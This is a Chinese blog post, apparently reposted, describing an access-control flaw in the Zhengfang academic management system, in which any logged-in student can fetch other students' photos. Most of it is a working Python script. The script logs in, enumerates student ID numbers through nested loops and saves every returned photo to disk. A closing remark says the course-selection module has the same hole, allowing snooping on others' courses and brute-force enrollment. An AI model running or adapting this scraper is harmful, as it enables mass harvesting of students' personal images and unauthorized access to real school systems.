【正方教务管理系统】HACK日志（二）

时间 2019-11-06

标签正方教务管理系统 hack 日志繁體版

原文原文链接

正方系统的一个漏洞是获取学生图片时没有对学生身份进行检测。理论上来讲，获取学生李四的照片，须要首先判断登录者身份是教师或者学生，若是是学生还要判断登录者是否为李四本人，而正方系统在这一方面并无作得很好，致使张三能够轻松地获取李四的照片。 html

下面是笔者编写的一个简单的爬虫程序，Python 代码以下（Python 3.2）， python

import http.client
import urllib
import os

_xh = '**********'
_pw = '**********'
VIEWSTATE = 'dDwtMTIwMTU3OTE3Nzs7PpxRSEGelcLnTaPgA3v56uoKweD+'
host = 'jwc.****.edu.cn:8989'
main_url = 'http://' + host
login_page = '/default2.aspx'
login_url = main_url + login_page
readimage_page = '/readimagexs.aspx'
print(main_url)
print(login_url)


conn = http.client.HTTPConnection(host)
login_post_data = urllib.parse.urlencode({
    '__VIEWSTATE': VIEWSTATE,
    'TextBox1': _xh,
    'TextBox2': _pw,
    'RadioButtonList1': '学生',
    'Button1': '',
    'lbLanguage': ''
})
login_post_data = login_post_data.encode('utf-8')
login_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'Origin':	main_url,
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer': main_url,
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3'
}

conn.request('POST', login_page, body = login_post_data, headers = login_headers)
result = conn.getresponse()
print(result.status)
#print(result.read())
cookie = result.msg['set-cookie'].split(';')[0]
#print(cookie)
conn.close()

readimage_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
    'Cookie': cookie
}

conn.request('GET', '/xs_main.aspx' + '?' + 'xh=' + _xh, headers = readimage_headers)
#result = conn.getresponse()
#print(result.status)
#print(result.read())
conn.close()

for year in range(1, 12):#11
    for college in range(1, 20):#19
        for major in range(1, 15):#14
            for mclass in range(1, 10):
                for series in range(1, 50):
                    image_xh = "%02d%02d%02d%02d%02d" % (year, college, major, mclass, series)
                    readimage_url = readimage_page + '?' + 'xh=' + image_xh
                    print(readimage_url)
                    conn.request('GET', readimage_url, headers = readimage_headers)
                    result = conn.getresponse()
                    #print(result.status)
                    image = result.read()
                    if len(image) > 1024:
                        save_path = os.path.join(os.path.abspath('./pic/'), image_xh + '.bmp')
                        print(save_path)
                        fp = open(save_path, 'wb')
                        fp.write(image)
                        fp.close()
                    else:
                        print('skip')
print('done')
conn.close()

后记：正方的选课模块依然有这样的漏洞，所以理论上来讲，偷窥别人的课程、暴力选课也照样能够实现。 cookie

2012-07-01
By whypro app